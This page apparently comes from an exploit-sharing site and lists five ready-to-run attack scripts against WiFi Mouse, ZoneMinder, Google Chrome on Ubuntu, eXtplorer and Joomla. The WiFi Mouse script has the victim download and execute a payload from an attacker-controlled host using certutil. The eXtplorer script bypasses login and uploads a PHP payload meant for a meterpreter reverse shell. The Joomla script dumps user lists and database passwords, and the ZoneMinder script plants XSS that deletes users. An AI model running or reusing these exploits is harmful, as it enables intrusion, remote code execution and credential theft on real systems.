Latest exploits :: CodePwn

<pre><code># Exploit Title: WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE) # Date: 13-10-2022 # Author: Payal # Vendor Homepage: http://necta.us/ # Software Link: http://wifimouse.necta.us/#download # Version: 1.8.3.2 # Tested on: Windows 10 Pro Build 21H2 # Desktop Server software used by mobile app has PIN option which does not to prevent command input.# Connection response will be 'needpassword' which is only interpreted by mobile app and prompts for PIN input. #!/usr/bin/env python3 from socket import socket, AF_INET, SOCK_STREAMfrom time import sleepimport sysimport string target = socket(AF_INET, SOCK_STREAM) port = 1978 try: rhost = sys.argv[1] lhost = sys.argv[2] payload = sys.argv[3]except: print("USAGE: python " + sys.argv[0]+ " <target-ip> <local-http-server-ip> <payload-name>") exit() characters={ "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e", "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a", "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e", "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a", "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30", " ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c", ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a", "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e", "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"} def openCMD(): target.sendto(bytes.fromhex("6f70656e66696c65202f432f57696e646f77732f53797374656d33322f636d642e6578650a"), (rhost,port)) # openfile /C/Windows/System32/cmd.exe def SendString(string): for char in string: target.sendto(bytes.fromhex("7574663820" + characters[char] + "0a"),(rhost,port)) # Sends Character hex with packet padding sleep(0.03) def SendReturn(): target.sendto(bytes.fromhex("6b657920203352544e"),(rhost,port)) # 'key 3RTN' - Similar to 'Remote Mouse' mobile app sleep(0.5) def exploit(): print("[+] 3..2..1..") sleep(2) openCMD() print("[+] *Super fast hacker typing*") sleep(1) SendString("certutil.exe -urlcache -f http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload) SendReturn() print("[+] Retrieving payload") sleep(3) SendString("C:\\Windows\\Temp\\" + payload) SendReturn() print("[+] Done! Check Your Listener?") def main(): target.connect((rhost,port)) exploit() target.close() exit() if __name__=="__main__": main() </code></pre>

<pre><code># Exploit Title: Zoneminder v1.36.26 - Log Injection -> CSRF Bypass -> Stored Cross-Site Scripting (XSS) # Date: 10/01/2022 # Exploit Author: Trenches of IT # Vendor Homepage: https://github.com/ZoneMinder/zoneminder # Version: v1.36.26 # Tested on: Linux/Windows # CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291 # Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/ # # Proof of Concept: # 1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped) # 2 - Admin user logs navigates to http://<target>/zm/index.php?view=log # 3 - XSS executes delete function on target UID (user). import requests import re import time import argparse import sys def getOptions(args=sys.argv[1:]): parser = argparse.ArgumentParser(description="Trenches of IT Zoneminder Exploit PoC", epilog="Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1") parser.add_argument("-i", "--ip", help="Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4", required=True) parser.add_argument("-p", "--port", help="Provide the port of the target zoneminder server. (Example: -p 80", required=True) parser.add_argument("-zU", "--username", help="Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv", required=True) parser.add_argument("-zP", "--password", help="Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv", required=True) parser.add_argument("-d", "--deleteUser", help="Provide the target user UID to delete from the target zoneminder server. (Example: -d 7", required=True) options = parser.parse_args(args) return options options = getOptions(sys.argv[1:]) payload = "http%3A%2F%2F" + options.ip + "%2Fzm%2F</td></tr><script src='/zm/index.php?view=options&tab=users&action=delete&markUids[]=" + options.deleteUser + "&deleteBtn=Delete'</script>" #Request to login and get the response headers loginUrl = "http://" + options.ip + ":" + options.port + "/zm/index.php?action=login&view=login&username="+options.username+"&password="+options.password loginCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": "f1neru6bq6bfddl7snpjqo6ss2"} loginHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=login", "Upgrade-Insecure-Requests": "1"} response = requests.post(loginUrl, headers=loginHeaders, cookies=loginCookies) zmHeaders = response.headers try: zoneminderSession = re.findall(r'ZMSESSID\=\w+\;', str(zmHeaders)) finalSession = zoneminderSession[-1].replace('ZMSESSID=', '').strip(';') except: print("[ERROR] Ensure the provided username and password is correct.") sys.exit(1) print("Collected the low privilege user session token: "+finalSession) #Request using response headers to obtain CSRF value csrfUrl = "http://"+options.ip+":"+options.port+"/zm/index.php?view=filter" csrfCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": '"' + finalSession + '"'} csrfHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=montagereview&fit=1&minTime=2022-09-30T20:52:58&maxTime=2022-09-30T21:22:58&current=2022-09-30%2021:07:58&displayinterval=1000&live=0&scale=1&speed=1", "Upgrade-Insecure-Requests": "1"} response = requests.get(csrfUrl, headers=csrfHeaders, cookies=csrfCookies) zmBody = response.text extractedCsrfKey = re.findall(r'csrfMagicToken\s\=\s\"key\:\w+\,\d+', str(zmBody)) finalCsrfKey = extractedCsrfKey[0].replace('csrfMagicToken = "', '') print("Collected the CSRF key for the log injection request: "+finalCsrfKey) print("Navigate here with an admin user: http://"+options.ip+"/zm/index.php?view=log") while True: #XSS Request xssUrl = "http://"+options.ip+"/zm/index.php" xssCookies = {"zmSkin": "classic", "zmCSS": "base", "zmLogsTable.bs.table.pageNumber": "1", "zmEventsTable.bs.table.columns": "%5B%22Id%22%2C%22Name%22%2C%22Monitor%22%2C%22Cause%22%2C%22StartDateTime%22%2C%22EndDateTime%22%2C%22Length%22%2C%22Frames%22%2C%22AlarmFrames%22%2C%22TotScore%22%2C%22AvgScore%22%2C%22MaxScore%22%2C%22Storage%22%2C%22DiskSpace%22%2C%22Thumbnail%22%5D", "zmEventsTable.bs.table.searchText": "", "zmEventsTable.bs.table.pageNumber": "1", "zmBandwidth": "high", "zmHeaderFlip": "up", "ZMSESSID": finalSession} xssHeaders = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Origin": "http://"+options.ip, "Connection": "close", "Referer": "http://"+options.ip+"/zm/index.php?view=filter"} xssData = {"__csrf_magic": finalCsrfKey , "view": "request", "request": "log", "task": "create", "level": "ERR", "message": "Trenches%20of%20IT%20PoC", "browser[name]": "Firefox", "browser[version]": "91.0", "browser[platform]": "UNIX", "file": payload, "line": "105"} response = requests.post(xssUrl, headers=xssHeaders, cookies=xssCookies, data=xssData) print("Injecting payload: " + response.text) time.sleep(1) </code></pre>

<pre><code>#Vulnerability: Google Chrome code execution via missing lib file (Ubuntu) Product: Google Chrome Discovered by: Rafay Baloch and Muhammad Samak #Version: 109.0.5414.74 #Impact: Moderate #Company: Cyber Citadel #Website: https://www.cybercitadel.com #Tested-on : Ubuntu 22.04.1 *Description* Google chrome attempts to load the 'libssckbi.so' file from a user-writable location. PATH: /home/$username/.pki/nssdb/libnssckbi.so Since the Shared Library 'ibnssckbi.so' specified path is writeable. It is possible to achieve the Code Execution by placing the malicious file with the name `libnssckbi.so` in the specified path. *exploit* Following is the POC that could be used to reproduce the issue: echo "\n\t\t\tGoogle-Chrome Shared Library Code Execution..." echo "[*] Checking /.pki/nssdb PATH" if [ -d "/home/haalim/.pki/nssdb" ] then echo "[+] Directory Exists..." if [ -w "/home/haalim/.pki/nssdb" ] then echo "[+] Directory is writable..." echo "[+] Directory is writable..." echo "[+] Generating malicious File libnssckbi.so ..." echo "#define _GNU_SOURCE" > /home/haalim/.pki/nssdb/exploit.c echo "#include <unistd.h>" >> /home/haalim/.pki/nssdb/exploit.c echo "#include <stdio.h>" >> /home/haalim/.pki/nssdb/exploit.c echo "#include <stdlib.h>" >> /home/haalim/.pki/nssdb/exploit.c echo "void f() {" >> /home/haalim/.pki/nssdb/exploit.c echo 'printf("Code Executed............ TMGM :)\n");' >> /home/haalim/.pki/nssdb/exploit.c echo "}" >> /home/haalim/.pki/nssdb/exploit.c gcc -c -Wall -Werror -fpic /home/haalim/.pki/nssdb/exploit.c -o /home/haalim/.pki/nssdb/exploit.o gcc -shared -o /home/haalim/.pki/nssdb/libnssckbi.so -Wl,-init,f /home/haalim/.pki/nssdb/exploit.o fi fi Upon closing the browser windows, the application executes the malicious code *Impact* The attacker can use this behavior to bypass the application whitelisting rules. This behavior can also lead to DoS attacks. An attacker can trick a victim into supplying credentials by creating a fake prompt. </code></pre>

<pre><code># Exploit Title: eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE) # Exploit Author: ErPaciocco # Author Website: https://erpaciocco.github.io # Vendor Homepage: https://extplorer.net/ # # Vendor: # ============== # extplorer.net # # Product: # ================== # eXtplorer <= v2.1.14 # # eXtplorer is a PHP and Javascript-based File Manager, it allows to browse # directories, edit, copy, move, delete, # search, upload and download files, create & extract archives, create new # files and directories, change file # permissions (chmod) and more. It is often used as FTP extension for popular # applications like Joomla. # # Vulnerability Type: # ====================== # Authentication Bypass (& Remote Command Execution) # # # Vulnerability Details: # ===================== # # eXtplorer authentication mechanism allows an attacker # to login into the Admin Panel without knowing the password # of the victim, but only its username. This vector is exploited # by not supplying password in POST request. # # # Tested on Windows # # # Reproduction steps: # ================== # # 1) Navigate to Login Panel # 2) Intercept authentication POST request to /index.php # 3) Remove 'password' field # 4) Send it and enjoy! # # # Exploit code(s): # =============== # # Run below PY script from CLI... # # [eXtplorer_auth_bypass.py] # # Proof Of Concept try: import requests except: print(f"ERROR: RUN: pip install requests") exit() import sys import time import urllib.parse import re import random import string import socket import time import base64 TARGET = None WORDLIST = None _BUILTIN_WL = [ 'root', 'admin', 'test', 'guest', 'info', 'adm', 'user', 'administrator' ] _HOST = None _PATH = None _SESSION = None _HEADERS = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 'Accept-Language': 'it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3', 'Accept-Encoding': 'gzip, deflate, br', 'Connection': 'keep-alive' } def detect(): global _HOST global _PATH global _SESSION global _HEADERS _HOST = TARGET[0].split(':')[0] + '://' + TARGET[0].split('/')[2] _PATH = '/'.join(TARGET[0].split('/')[3:]).rstrip('/') _SESSION = requests.Session() raw = _SESSION.get(f"{_HOST}/{_PATH}/extplorer.xml", headers=_HEADERS, verify=False) if raw.status_code == 200: ver = re.findall("<version>(((\d+)\.?)+)<\/version>", raw.text, re.MULTILINE) if int(ver[0][2]) < 15: return True return False def auth_bypass(): global _HOST global _PATH global _SESSION global _HEADERS global WORDLIST global _BUILTIN_WL _HEADERS['X-Requested-With'] = 'XMLHttpRequest' params = {'option': 'com_extplorer', 'action': 'login', 'type': 'extplorer', 'username': 'admin', 'lang':'english'} if WORDLIST != None: if WORDLIST == _BUILTIN_WL: info(f"Attempting to guess an username from builtin wordlist") wl = _BUILTIN_WL else: info(f"Attempting to guess an username from wordlist: {WORDLIST[0]}") with open(WORDLIST[0], "r") as f: wl = f.read().split('\n') for user in wl: params = {'option': 'com_extplorer', 'action': 'login', 'type': 'extplorer', 'username': user, 'lang':'english'} info(f"Trying with {user}") res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False) if "successful" in res.text: return (user) else: res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False) if "successful" in res.text: return ('admin') return False def rce(): global _HOST global _PATH global _SESSION global _HEADERS global _PAYLOAD tokenReq = _SESSION.get(f"{_HOST}/{_PATH}/index.php?option=com_extplorer&action=include_javascript&file=functions.js") token = re.findall("token:\s\"([a-f0-9]{32})\"", tokenReq.text)[0] info(f"CSRF Token obtained: {token}") payload = editPayload() info(f"Payload edited to fit local parameters") params = {'option': 'com_extplorer', 'action': 'upload', 'dir': f"./{_PATH}", 'requestType': 'xmlhttprequest', 'confirm':'true', 'token': token} name = ''.join(random.choices(string.ascii_uppercase + string.digits, k=6)) files = {'userfile[0]':(f"{name}.php", payload)} req = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, files=files, verify=False) if "successful" in req.text: info(f"File {name}.php uploaded in root dir") info(f"Now set a (metasploit) listener and go to: {_HOST}/{_PATH}/{name}.php") def attack(): if not TARGET: error("TARGET needed") if TARGET: if not detect(): error("eXtplorer vulnerable instance not found!") exit(1) else: info("eXtplorer endpoint is vulnerable!") username = auth_bypass() if username: info("Auth bypassed!") rce() else: error("Username 'admin' not found") def error(message): print(f"[E] {message}") def info(message): print(f"[I] {message}") def editPayload(): # You can generate payload with msfvenom and paste below base64 encoded result # msfvenom -p php/meterpreter_reverse_tcp LHOST=<yourIP> LPORT=<yourPORT> -f base64 return base64.b64decode("PD9waHAgZWNobyAiSEFDS0VEISI7ICA/Pg==") def help(): print(r"""eXtplorer <= 2.1.14 exploit - Authentication Bypass & Remote Code Execution Usage: python3 eXtplorer_auth_bypass.py -t <target-host> [-w <userlist>] [-wb] Options: -t Target host. Provide target IP address (and optionally port). -w Wordlist for user enumeration and authentication (Optional) -wb Use built-in wordlist for user enumeration (Optional) -h Show this help menu. """) return True args = {"t" : (1, lambda *x: (globals().update(TARGET = x[0]))), "w" : (1, lambda *x: (globals().update(WORDLIST = x[0]))), "wb": (0, lambda *x: (globals().update(WORDLIST = _BUILTIN_WL))), "h" : (0, lambda *x: (help() and exit(0)))} if __name__ == "__main__": i = 1 [ args[ arg[1:]][1](sys.argv[i+1: (i:=i+1+args[arg[1:]][0]) ]) for arg in [k for k in sys.argv[i:] ] if arg[0] == '-' ] attack() else: help() # /////////////////////////////////////////////////////////////////////// # [Script examples] # # # c:\>python eXtplorer_auth_bypass.py -t https://target.com # c:\>python eXtplorer_auth_bypass.py -t http://target.com:1234 -w wordlist.txt # c:\>python eXtplorer_auth_bypass.py -t http://target.com -wb # Exploitation Method: # ====================== # Remote # [+] Disclaimer # The information contained within this advisory is supplied "as-is" with no # warranties or guarantees of fitness of use or otherwise. # Permission is hereby granted for the redistribution of this advisory, # provided that it is not altered except by reformatting it, and # that due credit is given. Permission is explicitly given for insertion in # vulnerability databases and similar, provided that due credit # is given to the author. The author is not responsible for any misuse of the # information contained herein and accepts no responsibility # for any damage caused by the use or misuse of this information. </code></pre>

<pre><code>#!/usr/bin/env ruby # Exploit ## Title: Joomla! < 4.2.8 - Unauthenticated information disclosure ## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr) ## Author website: https://pwn.by/noraj/ ## Exploit source: https://github.com/Acceis/exploit-CVE-2023-23752 ## Date: 2023-03-24 ## Vendor Homepage: https://www.joomla.org/ ## Software Link: https://downloads.joomla.org/cms/joomla4/4-2-7/Joomla_4-2-7-Stable-Full_Package.tar.gz?format=gz ## Version: 4.0.0 < 4.2.8 (it means from 4.0.0 up to 4.2.7) ## Tested on: Joomla! Version 4.2.7 ## CVE : CVE-2023-23752 # Vulnerability ## Discoverer: Zewei Zhang from NSFOCUS TIANJI Lab ## Date: 2023-02-24 ## Discoverer website: https://nsfocusglobal.com/company-overview/nsfocus-security-labs/ ## Title: Joomla Unauthorized Access ## CVE: CVE-2023-23752 ## Patch: Update to >= 4.2.8 ## References: ## - https://nsfocusglobal.com/joomla-unauthorized-access-vulnerability-cve-2023-23752-notice/ ## - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html ## - https://attackerkb.com/topics/18qrh3PXIX/cve-2023-23752 ## - https://nvd.nist.gov/vuln/detail/CVE-2023-23752 ## - https://vulncheck.com/blog/joomla-for-rce ## - https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-23752.yaml # standard library require 'json' # gems require 'httpx' require 'docopt' require 'paint' doc = <<~DOCOPT #{Paint['Joomla! < 4.2.8 - Unauthenticated information disclosure', :bold]} #{Paint['Usage:', :red]} #{__FILE__} <url> [options] #{__FILE__} -h | --help #{Paint['Parameters:', :red]} <url> Root URL (base path) including HTTP scheme, port and root folder #{Paint['Options:', :red]} --debug Display arguments --no-color Disable colorized output (NO_COLOR environment variable is respected too) -h, --help Show this screen #{Paint['Examples:', :red]} #{__FILE__} http://127.0.0.1:4242 #{__FILE__} https://example.org/subdir #{Paint['Project:', :red]} #{Paint['author', :underline]} (https://pwn.by/noraj / https://twitter.com/noraj_rawsec) #{Paint['company', :underline]} (https://www.acceis.fr / https://twitter.com/acceis) #{Paint['source', :underline]} (https://github.com/Acceis/exploit-CVE-2023-23752) DOCOPT def fetch_users(root_url, http) vuln_url = "#{root_url}/api/index.php/v1/users?public=true" http.get(vuln_url) end def parse_users(root_url, http) data_json = fetch_users(root_url, http) data = JSON.parse(data_json)['data'] users = [] data.each do |user| if user['type'] == 'users' id = user['attributes']['id'] name = user['attributes']['name'] username = user['attributes']['username'] email = user['attributes']['email'] groups = user['attributes']['group_names'] users << {id: id, name: name, username: username, email: email, groups: groups} end end users end def display_users(root_url, http) users = parse_users(root_url, http) puts Paint['Users', :red, :bold] users.each do |u| puts "[#{u[:id]}] #{u[:name]} (#{Paint[u[:username], :yellow]}) - #{u[:email]} - #{u[:groups]}" end end def fetch_config(root_url, http) vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true" http.get(vuln_url) end def parse_config(root_url, http) data_json = fetch_config(root_url, http) data = JSON.parse(data_json)['data'] config = {} data.each do |entry| if entry['type'] == 'application' key = entry['attributes'].keys.first config[key] = entry['attributes'][key] end end config end def display_config(root_url, http) c = parse_config(root_url, http) puts Paint['Site info', :red, :bold] puts "Site name: #{c['sitename']}" puts "Editor: #{c['editor']}" puts "Captcha: #{c['captcha']}" puts "Access: #{c['access']}" puts "Debug status: #{c['debug']}" puts puts Paint['Database info', :red, :bold] puts "DB type: #{c['dbtype']}" puts "DB host: #{c['host']}" puts "DB user: #{Paint[c['user'], :yellow, :bold]}" puts "DB password: #{Paint[c['password'], :yellow, :bold]}" puts "DB name: #{c['db']}" puts "DB prefix: #{c['dbprefix']}" puts "DB encryption #{c['dbencryption']}" end begin args = Docopt.docopt(doc) Paint.mode = 0 if args['--no-color'] puts args if args['--debug'] http = HTTPX display_users(args['<url>'], http) puts display_config(args['<url>'], http) rescue Docopt::Exit => e puts e.message end </code></pre>